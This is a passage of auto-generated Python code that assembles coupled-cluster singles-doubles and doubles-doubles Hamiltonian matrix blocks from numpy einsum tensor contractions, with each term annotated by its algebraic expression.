# 1.0000 P(m,n)d(f,a)*<i,j||b,c>*t1(b,n)*t2(c,e,m,j)
contracted_intermediate = 1.000000000000000 * einsum('fa,ijbc,bn,cemj->efmnai', kd[v, v], g[o, o, v, v], t1, t2, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->efnmai', contracted_intermediate)
# 0.5000 d(e,a)*d(m,i)*<k,j||b,c>*t1(b,n)*t2(c,f,k,j)
Hds += 0.500000000000000 * einsum('ea,mi,kjbc,bn,cfkj->efmnai', kd[v, v], kd[o, o], g[o, o, v, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 2), (0, 2), (0, 1)])
# -1.0000 P(m,n)d(e,a)*<i,j||b,c>*t1(b,n)*t2(c,f,m,j)
contracted_intermediate = -1.000000000000000 * einsum('ea,ijbc,bn,cfmj->efmnai', kd[v, v], g[o, o, v, v], t1, t2, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->efnmai', contracted_intermediate)
# -0.5000 d(m,i)*<k,j||b,a>*t1(b,n)*t2(e,f,k,j)
Hds += -0.500000000000000 * einsum('mi,kjba,bn,efkj->efmnai', kd[o, o], g[o, o, v, v], t1, t2, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
# 1.0000 P(m,n)<i,j||b,a>*t1(b,n)*t2(e,f,m,j)
contracted_intermediate = 1.000000000000000 * einsum('ijba,bn,efmj->efmnai', g[o, o, v, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 1)])
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->efnmai', contracted_intermediate)
# 0.5000 d(f,a)*d(n,i)*<k,j||b,c>*t1(b,m)*t2(c,e,k,j)
Hds += 0.500000000000000 * einsum('fa,ni,kjbc,bm,cekj->efmnai', kd[v, v], kd[o, o], g[o, o, v, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 2), (0, 2), (0, 1)])
# -0.5000 d(e,a)*d(n,i)*<k,j||b,c>*t1(b,m)*t2(c,f,k,j)
Hds += -0.500000000000000 * einsum('ea,ni,kjbc,bm,cfkj->efmnai', kd[v, v], kd[o, o], g[o, o, v, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 2), (0, 2), (0, 1)])
# 0.5000 d(n,i)*<k,j||b,a>*t1(b,m)*t2(e,f,k,j)
Hds += 0.500000000000000 * einsum('ni,kjba,bm,efkj->efmnai', kd[o, o], g[o, o, v, v], t1, t2, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
# -0.5000 d(f,a)*d(m,i)*<k,j||b,c>*t1(e,j)*t2(b,c,n,k)
Hds += -0.500000000000000 * einsum('fa,mi,kjbc,ej,bcnk->efmnai', kd[v, v], kd[o, o], g[o, o, v, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 2), (0, 2), (0, 1)])
# 0.5000 d(f,a)*d(n,i)*<k,j||b,c>*t1(e,j)*t2(b,c,m,k)
Hds += 0.500000000000000 * einsum('fa,ni,kjbc,ej,bcmk->efmnai', kd[v, v], kd[o, o], g[o, o, v, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 2), (0, 2), (0, 1)])
# -0.5000 d(f,a)*<i,j||b,c>*t1(e,j)*t2(b,c,m,n)
Hds += -0.500000000000000 * einsum('fa,ijbc,ej,bcmn->efmnai', kd[v, v], g[o, o, v, v], t1, t2, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
# 1.0000 P(e,f)d(m,i)*<k,j||b,a>*t1(e,j)*t2(b,f,n,k)
contracted_intermediate = 1.000000000000000 * einsum('mi,kjba,ej,bfnk->efmnai', kd[o, o], g[o, o, v, v], t1, t2, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->femnai', contracted_intermediate)
# -1.0000 P(e,f)d(n,i)*<k,j||b,a>*t1(e,j)*t2(b,f,m,k)
contracted_intermediate = -1.000000000000000 * einsum('ni,kjba,ej,bfmk->efmnai', kd[o, o], g[o, o, v, v], t1, t2, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->femnai', contracted_intermediate)
# 1.0000 P(e,f)<i,j||b,a>*t1(e,j)*t2(b,f,m,n)
contracted_intermediate = 1.000000000000000 * einsum('ijba,ej,bfmn->efmnai', g[o, o, v, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 1)])
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->femnai', contracted_intermediate)
# 0.5000 d(e,a)*d(m,i)*<k,j||b,c>*t1(f,j)*t2(b,c,n,k)
Hds += 0.500000000000000 * einsum('ea,mi,kjbc,fj,bcnk->efmnai', kd[v, v], kd[o, o], g[o, o, v, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 2), (0, 2), (0, 1)])
# -0.5000 d(e,a)*d(n,i)*<k,j||b,c>*t1(f,j)*t2(b,c,m,k)
Hds += -0.500000000000000 * einsum('ea,ni,kjbc,fj,bcmk->efmnai', kd[v, v], kd[o, o], g[o, o, v, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 2), (0, 2), (0, 1)])
# 0.5000 d(e,a)*<i,j||b,c>*t1(f,j)*t2(b,c,m,n)
Hds += 0.500000000000000 * einsum('ea,ijbc,fj,bcmn->efmnai', kd[v, v], g[o, o, v, v], t1, t2, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
# -1.0000 d(f,a)*d(m,i)*<k,j||b,n>*t1(b,j)*t1(e,k)
Hds += -1.000000000000000 * einsum('fa,mi,kjbn,bj,ek->efmnai', kd[v, v], kd[o, o], g[o, o, v, o], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# 1.0000 d(e,a)*d(m,i)*<k,j||b,n>*t1(b,j)*t1(f,k)
Hds += 1.000000000000000 * einsum('ea,mi,kjbn,bj,fk->efmnai', kd[v, v], kd[o, o], g[o, o, v, o], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# -1.0000 P(m,n)d(f,a)*<i,j||b,n>*t1(b,m)*t1(e,j)
contracted_intermediate = -1.000000000000000 * einsum('fa,ijbn,bm,ej->efmnai', kd[v, v], g[o, o, v, o], t1, t1, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->efnmai', contracted_intermediate)
# 1.0000 P(m,n)d(e,a)*<i,j||b,n>*t1(b,m)*t1(f,j)
contracted_intermediate = 1.000000000000000 * einsum('ea,ijbn,bm,fj->efmnai', kd[v, v], g[o, o, v, o], t1, t1, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->efnmai', contracted_intermediate)
# -1.0000 d(m,i)*<k,j||a,n>*t1(e,j)*t1(f,k)
Hds += -1.000000000000000 * einsum('mi,kjan,ej,fk->efmnai', kd[o, o], g[o, o, v, o], t1, t1, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
# 1.0000 d(f,a)*d(n,i)*<k,j||b,m>*t1(b,j)*t1(e,k)
Hds += 1.000000000000000 * einsum('fa,ni,kjbm,bj,ek->efmnai', kd[v, v], kd[o, o], g[o, o, v, o], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# -1.0000 d(e,a)*d(n,i)*<k,j||b,m>*t1(b,j)*t1(f,k)
Hds += -1.000000000000000 * einsum('ea,ni,kjbm,bj,fk->efmnai', kd[v, v], kd[o, o], g[o, o, v, o], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# 1.0000 d(n,i)*<k,j||a,m>*t1(e,j)*t1(f,k)
Hds += 1.000000000000000 * einsum('ni,kjam,ej,fk->efmnai', kd[o, o], g[o, o, v, o], t1, t1, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
# -1.0000 d(f,a)*d(m,i)*<j,e||b,c>*t1(b,j)*t1(c,n)
Hds += -1.000000000000000 * einsum('fa,mi,jebc,bj,cn->efmnai', kd[v, v], kd[o, o], g[o, v, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# 1.0000 d(f,a)*d(n,i)*<j,e||b,c>*t1(b,j)*t1(c,m)
Hds += 1.000000000000000 * einsum('fa,ni,jebc,bj,cm->efmnai', kd[v, v], kd[o, o], g[o, v, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# -1.0000 d(f,a)*<i,e||b,c>*t1(b,n)*t1(c,m)
Hds += -1.000000000000000 * einsum('fa,iebc,bn,cm->efmnai', kd[v, v], g[o, v, v, v], t1, t1, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
# -1.0000 P(e,f)d(m,i)*<j,e||b,a>*t1(b,n)*t1(f,j)
contracted_intermediate = -1.000000000000000 * einsum('mi,jeba,bn,fj->efmnai', kd[o, o], g[o, v, v, v], t1, t1, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->femnai', contracted_intermediate)
# 1.0000 P(e,f)d(n,i)*<j,e||b,a>*t1(b,m)*t1(f,j)
contracted_intermediate = 1.000000000000000 * einsum('ni,jeba,bm,fj->efmnai', kd[o, o], g[o, v, v, v], t1, t1, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->femnai', contracted_intermediate)
# 1.0000 d(e,a)*d(m,i)*<j,f||b,c>*t1(b,j)*t1(c,n)
Hds += 1.000000000000000 * einsum('ea,mi,jfbc,bj,cn->efmnai', kd[v, v], kd[o, o], g[o, v, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# -1.0000 d(e,a)*d(n,i)*<j,f||b,c>*t1(b,j)*t1(c,m)
Hds += -1.000000000000000 * einsum('ea,ni,jfbc,bj,cm->efmnai', kd[v, v], kd[o, o], g[o, v, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# 1.0000 d(e,a)*<i,f||b,c>*t1(b,n)*t1(c,m)
Hds += 1.000000000000000 * einsum('ea,ifbc,bn,cm->efmnai', kd[v, v], g[o, v, v, v], t1, t1, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
# -1.0000 d(f,a)*d(m,i)*<k,j||b,c>*t1(b,j)*t1(c,n)*t1(e,k)
Hds += -1.000000000000000 * einsum('fa,mi,kjbc,bj,cn,ek->efmnai', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 3), (0, 2), (0, 1)])
# 1.0000 d(e,a)*d(m,i)*<k,j||b,c>*t1(b,j)*t1(c,n)*t1(f,k)
Hds += 1.000000000000000 * einsum('ea,mi,kjbc,bj,cn,fk->efmnai', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 3), (0, 2), (0, 1)])
# 1.0000 d(f,a)*d(n,i)*<k,j||b,c>*t1(b,j)*t1(c,m)*t1(e,k)
Hds += 1.000000000000000 * einsum('fa,ni,kjbc,bj,cm,ek->efmnai', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 3), (0, 2), (0, 1)])
# -1.0000 d(e,a)*d(n,i)*<k,j||b,c>*t1(b,j)*t1(c,m)*t1(f,k)
Hds += -1.000000000000000 * einsum('ea,ni,kjbc,bj,cm,fk->efmnai', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 3), (0, 2), (0, 1)])
# 1.0000 d(f,a)*<i,j||b,c>*t1(b,n)*t1(c,m)*t1(e,j)
Hds += 1.000000000000000 * einsum('fa,ijbc,bn,cm,ej->efmnai', kd[v, v], g[o, o, v, v], t1, t1, t1, optimize=['einsum_path', (1, 2), (1, 3), (1, 2), (0, 1)])
# -1.0000 d(e,a)*<i,j||b,c>*t1(b,n)*t1(c,m)*t1(f,j)
Hds += -1.000000000000000 * einsum('ea,ijbc,bn,cm,fj->efmnai', kd[v, v], g[o, o, v, v], t1, t1, t1, optimize=['einsum_path', (1, 2), (1, 3), (1, 2), (0, 1)])
# 1.0000 d(m,i)*<k,j||b,a>*t1(b,n)*t1(e,j)*t1(f,k)
Hds += 1.000000000000000 * einsum('mi,kjba,bn,ej,fk->efmnai', kd[o, o], g[o, o, v, v], t1, t1, t1, optimize=['einsum_path', (1, 2), (1, 3), (1, 2), (0, 1)])
# -1.0000 d(n,i)*<k,j||b,a>*t1(b,m)*t1(e,j)*t1(f,k)
Hds += -1.000000000000000 * einsum('ni,kjba,bm,ej,fk->efmnai', kd[o, o], g[o, o, v, v], t1, t1, t1, optimize=['einsum_path', (1, 2), (1, 3), (1, 2), (0, 1)])
# H(m,n,e,f;i,j,a,b) = <0|e2(m,n,f,e) e(-T) H e(T) e2(a,b,j,i)|0>
# 1.0000 d(e,a)*d(f,b)*d(n,j)*d(m,i)*f(k,k)
Hdd = 1.000000000000000 * einsum('ea,fb,nj,mi,kk->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], f[o, o], optimize=['einsum_path', (0, 1), (0, 2), (0, 2), (0, 1)])
# -1.0000 d(e,a)*d(f,b)*d(m,j)*d(n,i)*f(k,k)
Hdd += -1.000000000000000 * einsum('ea,fb,mj,ni,kk->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], f[o, o], optimize=['einsum_path', (0, 1), (0, 2), (0, 2), (0, 1)])
# -1.0000 d(f,a)*d(e,b)*d(n,j)*d(m,i)*f(k,k)
Hdd += -1.000000000000000 * einsum('fa,eb,nj,mi,kk->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], f[o, o], optimize=['einsum_path', (0, 1), (0, 2), (0, 2), (0, 1)])
# 1.0000 d(f,a)*d(e,b)*d(m,j)*d(n,i)*f(k,k)
Hdd += 1.000000000000000 * einsum('fa,eb,mj,ni,kk->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], f[o, o], optimize=['einsum_path', (0, 1), (0, 2), (0, 2), (0, 1)])
# -1.0000 d(e,a)*d(f,b)*d(m,i)*f(j,n)
Hdd += -1.000000000000000 * einsum('ea,fb,mi,jn->efmnabij', kd[v, v], kd[v, v], kd[o, o], f[o, o], optimize=['einsum_path', (0, 1, 2, 3)])
# 1.0000 d(e,a)*d(f,b)*d(m,j)*f(i,n)
Hdd += 1.000000000000000 * einsum('ea,fb,mj,in->efmnabij', kd[v, v], kd[v, v], kd[o, o], f[o, o], optimize=['einsum_path', (0, 1, 2, 3)])
# 1.0000 d(f,a)*d(e,b)*d(m,i)*f(j,n)
Hdd += 1.000000000000000 * einsum('fa,eb,mi,jn->efmnabij', kd[v, v], kd[v, v], kd[o, o], f[o, o], optimize=['einsum_path', (0, 1, 2, 3)])
# -1.0000 d(f,a)*d(e,b)*d(m,j)*f(i,n)
Hdd += -1.000000000000000 * einsum('fa,eb,mj,in->efmnabij', kd[v, v], kd[v, v], kd[o, o], f[o, o], optimize=['einsum_path', (0, 1, 2, 3)])
# 1.0000 d(e,a)*d(f,b)*d(n,i)*f(j,m)
Hdd += 1.000000000000000 * einsum('ea,fb,ni,jm->efmnabij', kd[v, v], kd[v, v], kd[o, o], f[o, o], optimize=['einsum_path', (0, 1, 2, 3)])
# -1.0000 d(e,a)*d(f,b)*d(n,j)*f(i,m)
Hdd += -1.000000000000000 * einsum('ea,fb,nj,im->efmnabij', kd[v, v], kd[v, v], kd[o, o], f[o, o], optimize=['einsum_path', (0, 1, 2, 3)])
# -1.0000 d(f,a)*d(e,b)*d(n,i)*f(j,m)
Hdd += -1.000000000000000 * einsum('fa,eb,ni,jm->efmnabij', kd[v, v], kd[v, v], kd[o, o], f[o, o], optimize=['einsum_path', (0, 1, 2, 3)])
# 1.0000 d(f,a)*d(e,b)*d(n,j)*f(i,m)
Hdd += 1.000000000000000 * einsum('fa,eb,nj,im->efmnabij', kd[v, v], kd[v, v], kd[o, o], f[o, o], optimize=['einsum_path', (0, 1, 2, 3)])
# 1.0000 d(f,b)*d(n,j)*d(m,i)*f(e,a)
Hdd += 1.000000000000000 * einsum('fb,nj,mi,ea->efmnabij', kd[v, v], kd[o, o], kd[o, o], f[v, v], optimize=['einsum_path', (0, 1, 2, 3)])
# -1.0000 d(f,b)*d(m,j)*d(n,i)*f(e,a)
Hdd += -1.000000000000000 * einsum('fb,mj,ni,ea->efmnabij', kd[v, v], kd[o, o], kd[o, o], f[v, v], optimize=['einsum_path', (0, 1, 2, 3)])
# -1.0000 d(f,a)*d(n,j)*d(m,i)*f(e,b)
Hdd += -1.000000000000000 * einsum('fa,nj,mi,eb->efmnabij', kd[v, v], kd[o, o], kd[o, o], f[v, v], optimize=['einsum_path', (0, 1, 2, 3)])
# 1.0000 d(f,a)*d(m,j)*d(n,i)*f(e,b)
Hdd += 1.000000000000000 * einsum('fa,mj,ni,eb->efmnabij', kd[v, v], kd[o, o], kd[o, o], f[v, v], optimize=['einsum_path', (0, 1, 2, 3)])
# -1.0000 d(e,b)*d(n,j)*d(m,i)*f(f,a)
Hdd += -1.000000000000000 * einsum('eb,nj,mi,fa->efmnabij', kd[v, v], kd[o, o], kd[o, o], f[v, v], optimize=['einsum_path', (0, 1, 2, 3)])
# 1.0000 d(e,b)*d(m,j)*d(n,i)*f(f,a)
Hdd += 1.000000000000000 * einsum('eb,mj,ni,fa->efmnabij', kd[v, v], kd[o, o], kd[o, o], f[v, v], optimize=['einsum_path', (0, 1, 2, 3)])
# 1.0000 d(e,a)*d(n,j)*d(m,i)*f(f,b)
Hdd += 1.000000000000000 * einsum('ea,nj,mi,fb->efmnabij', kd[v, v], kd[o, o], kd[o, o], f[v, v], optimize=['einsum_path', (0, 1, 2, 3)])
# -1.0000 d(e,a)*d(m,j)*d(n,i)*f(f,b)
Hdd += -1.000000000000000 * einsum('ea,mj,ni,fb->efmnabij', kd[v, v], kd[o, o], kd[o, o], f[v, v], optimize=['einsum_path', (0, 1, 2, 3)])
# 1.0000 d(e,a)*d(f,b)*d(n,j)*d(m,i)*f(k,c)*t1(c,k)
Hdd += 1.000000000000000 * einsum('ea,fb,nj,mi,kc,ck->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (2, 3), (0, 3), (0, 2), (0, 1)])
# -1.0000 d(e,a)*d(f,b)*d(m,j)*d(n,i)*f(k,c)*t1(c,k)
Hdd += -1.000000000000000 * einsum('ea,fb,mj,ni,kc,ck->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (2, 3), (0, 3), (0, 2), (0, 1)])
# -1.0000 d(f,a)*d(e,b)*d(n,j)*d(m,i)*f(k,c)*t1(c,k)
Hdd += -1.000000000000000 * einsum('fa,eb,nj,mi,kc,ck->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (2, 3), (0, 3), (0, 2), (0, 1)])
# 1.0000 d(f,a)*d(e,b)*d(m,j)*d(n,i)*f(k,c)*t1(c,k)
Hdd += 1.000000000000000 * einsum('fa,eb,mj,ni,kc,ck->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (2, 3), (0, 3), (0, 2), (0, 1)])
# -1.0000 d(e,a)*d(f,b)*d(m,i)*f(j,c)*t1(c,n)
Hdd += -1.000000000000000 * einsum('ea,fb,mi,jc,cn->efmnabij', kd[v, v], kd[v, v], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 1.0000 d(e,a)*d(f,b)*d(m,j)*f(i,c)*t1(c,n)
Hdd += 1.000000000000000 * einsum('ea,fb,mj,ic,cn->efmnabij', kd[v, v], kd[v, v], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 1.0000 d(f,a)*d(e,b)*d(m,i)*f(j,c)*t1(c,n)
Hdd += 1.000000000000000 * einsum('fa,eb,mi,jc,cn->efmnabij', kd[v, v], kd[v, v], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -1.0000 d(f,a)*d(e,b)*d(m,j)*f(i,c)*t1(c,n)
Hdd += -1.000000000000000 * einsum('fa,eb,mj,ic,cn->efmnabij', kd[v, v], kd[v, v], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 1.0000 d(e,a)*d(f,b)*d(n,i)*f(j,c)*t1(c,m)
Hdd += 1.000000000000000 * einsum('ea,fb,ni,jc,cm->efmnabij', kd[v, v], kd[v, v], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -1.0000 d(e,a)*d(f,b)*d(n,j)*f(i,c)*t1(c,m)
Hdd += -1.000000000000000 * einsum('ea,fb,nj,ic,cm->efmnabij', kd[v, v], kd[v, v], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -1.0000 d(f,a)*d(e,b)*d(n,i)*f(j,c)*t1(c,m)
Hdd += -1.000000000000000 * einsum('fa,eb,ni,jc,cm->efmnabij', kd[v, v], kd[v, v], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 1.0000 d(f,a)*d(e,b)*d(n,j)*f(i,c)*t1(c,m)
Hdd += 1.000000000000000 * einsum('fa,eb,nj,ic,cm->efmnabij', kd[v, v], kd[v, v], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -1.0000 d(f,b)*d(n,j)*d(m,i)*f(k,a)*t1(e,k)
Hdd += -1.000000000000000 * einsum('fb,nj,mi,ka,ek->efmnabij', kd[v, v], kd[o, o], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 1.0000 d(f,b)*d(m,j)*d(n,i)*f(k,a)*t1(e,k)
Hdd += 1.000000000000000 * einsum('fb,mj,ni,ka,ek->efmnabij', kd[v, v], kd[o, o], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 1.0000 d(f,a)*d(n,j)*d(m,i)*f(k,b)*t1(e,k)
Hdd += 1.000000000000000 * einsum('fa,nj,mi,kb,ek->efmnabij', kd[v, v], kd[o, o], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -1.0000 d(f,a)*d(m,j)*d(n,i)*f(k,b)*t1(e,k)
Hdd += -1.000000000000000 * einsum('fa,mj,ni,kb,ek->efmnabij', kd[v, v], kd[o, o], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 1.0000 d(e,b)*d(n,j)*d(m,i)*f(k,a)*t1(f,k)
Hdd += 1.000000000000000 * einsum('eb,nj,mi,ka,fk->efmnabij', kd[v, v], kd[o, o], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -1.0000 d(e,b)*d(m,j)*d(n,i)*f(k,a)*t1(f,k)
Hdd += -1.000000000000000 * einsum('eb,mj,ni,ka,fk->efmnabij', kd[v, v], kd[o, o], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -1.0000 d(e,a)*d(n,j)*d(m,i)*f(k,b)*t1(f,k)
Hdd += -1.000000000000000 * einsum('ea,nj,mi,kb,fk->efmnabij', kd[v, v], kd[o, o], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# 1.0000 d(e,a)*d(m,j)*d(n,i)*f(k,b)*t1(f,k)
Hdd += 1.000000000000000 * einsum('ea,mj,ni,kb,fk->efmnabij', kd[v, v], kd[o, o], kd[o, o], f[o, v], t1, optimize=['einsum_path', (0, 1), (1, 2), (0, 2), (0, 1)])
# -0.5000 d(e,a)*d(f,b)*d(n,j)*d(m,i)*<l,k||l,k>
Hdd += -0.500000000000000 * einsum('ea,fb,nj,mi,lklk->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], g[o, o, o, o], optimize=['einsum_path', (0, 1), (0, 2), (0, 2), (0, 1)])
# 0.5000 d(e,a)*d(f,b)*d(m,j)*d(n,i)*<l,k||l,k>
Hdd += 0.500000000000000 * einsum('ea,fb,mj,ni,lklk->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], g[o, o, o, o], optimize=['einsum_path', (0, 1), (0, 2), (0, 2), (0, 1)])
# 0.5000 d(f,a)*d(e,b)*d(n,j)*d(m,i)*<l,k||l,k>
Hdd += 0.500000000000000 * einsum('fa,eb,nj,mi,lklk->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], g[o, o, o, o], optimize=['einsum_path', (0, 1), (0, 2), (0, 2), (0, 1)])
# -0.5000 d(f,a)*d(e,b)*d(m,j)*d(n,i)*<l,k||l,k>
Hdd += -0.500000000000000 * einsum('fa,eb,mj,ni,lklk->efmnabij', kd[v, v], kd[v, v], kd[o, o], kd[o, o], g[o, o, o, o], optimize=['einsum_path', (0, 1), (0, 2), (0, 2), (0, 1)])
# 1.0000 d(e,a)*d(f,b)*<i,j||m,n>
Hdd += 1.000000000000000 * einsum('ea,fb,ijmn->efmnabij', kd[v, v], kd[v, v], g[o, o, o, o], optimize=['einsum_path', (0, 1, 2)])
# -1.0000 d(f,a)*d(e,b)*<i,j||m,n>
Hdd += -1.000000000000000 * einsum('fa,eb,ijmn->efmnabij', kd[v, v], kd[v, v], g[o, o, o, o], optimize=['einsum_path', (0, 1, 2)])
# 1.0000 d(f,b)*d(m,i)*<j,e||a,n>
Hdd += 1.000000000000000 * einsum('fb,mi,jean->efmnabij', kd[v, v], kd[o, o], g[o, v, v, o], optimize=['einsum_path', (0, 1, 2)])
# -1.0000 d(f,b)*d(m,j)*<i,e||a,n>
Hdd += -1.000000000000000 * einsum('fb,mj,iean->efmnabij', kd[v, v], kd[o, o], g[o, v, v, o], optimize=['einsum_path', (0, 1, 2)])
# -1.0000 d(f,a)*d(m,i)*<j,e||b,n>
Hdd += -1.000000000000000 * einsum('fa,mi,jebn->efmnabij', kd[v, v], kd[o, o], g[o, v, v, o], optimize=['einsum_path', (0, 1, 2)])
# 1.0000 d(f,a)*d(m,j)*<i,e||b,n>
Hdd += 1.000000000000000 * einsum('fa,mj,iebn->efmnabij', kd[v, v], kd[o, o], g[o, v, v, o], optimize=['einsum_path', (0, 1, 2)])
# -1.0000 d(f,b)*d(n,i)*<j,e||a,m>
Hdd += -1.000000000000000 * einsum('fb,ni,jeam->efmnabij', kd[v, v], kd[o, o], g[o, v, v, o], optimize=['einsum_path', (0, 1, 2)])
# 1.0000 d(f,b)*d(n,j)*<i,e||a,m>
Hdd += 1.000000000000000 * einsum('fb,nj,ieam->efmnabij', kd[v, v], kd[o, o], g[o, v, v, o], optimize=['einsum_path', (0, 1, 2)])
# 1.0000 d(f,a)*d(n,i)*<j,e||b,m>
Hdd += 1.000000000000000 * einsum('fa,ni,jebm->efmnabij', kd[v, v], kd[o, o], g[o, v, v, o], optimize=['einsum_path', (0, 1, 2)])
# -1.0000 d(f,a)*d(n,j)*<i,e||b,m>
Hdd += -1.000000000000000 * einsum('fa,nj,iebm->efmnabij', kd[v, v], kd[o, o], g[o, v, v, o], optimize=['einsum_path', (0, 1, 2)])
# -1.0000 d(e,b)*d(m,i)*<j,f||a,n>
Hdd += -1.000000000000000 * einsum('eb,mi,jfan->efmnabij', kd[v, v], kd[o, o], g[o, v, v, o], optimize=['einsum_path', (0, 1, 2)])
# 1.0000 d(e,b)*d(m,j)*<i,f||a,n>
Hdd += 1.000000000000000 * einsum('eb,mj,ifan->efmnabij', kd[v, v], kd[o, o], g[o, v, v, o], optimize=['einsum_path', (0, 1, 2)])
# 1.0000 d(e,a)*d(m,i)*<j,f||b,n>
Hdd += 1.000000000000000 * einsum('ea,mi,jfbn->efmnabij', kd[v, v], kd[o, o], g[o, v, v, o], optimize=['einsum_path', (0, 1, 2)])
# -1.0000 d(e,a)*d(m,j)*<i,f||b,n>
Hdd += -1.000000000000000 * einsum('ea,mj,ifbn->efmnabij', kd[v, v], kd[o, o], g[o, v, v, o], optimize=['einsum_path', (0, 1, 2)])
# 1.0000 d(e,b)*d(n,i)*<j,f||a,m>
Hdd += 1.000000000000000 * einsum('eb,ni,jfam->efmnabij', kd[v, v], kd[o, o], g[o, v, v, o], optimize=['einsum_path', (0, 1, 2)])
# -1.0000 d(e,b)*d(n,j)*<i,f||a,m>
Hdd += -1.000000000000000 * einsum('eb,nj,ifam->efmnabij', kd[v, v], kd[o, o], g[o, v, v, o], optimize=['einsum_path', (0, 1, 2)])
# -1.0000 d(e,a)*d(n,i)*<j,f||b,m>
Hdd += -1.000000000000000 * einsum('ea,ni,jfbm->efmnabij', kd[v, v], kd[o, o], g[o, v, v, o], optimize=['einsum_path', (0, 1, 2)])
# 1.0000 d(e,a)*d(n,j)*<i,f||b,m>
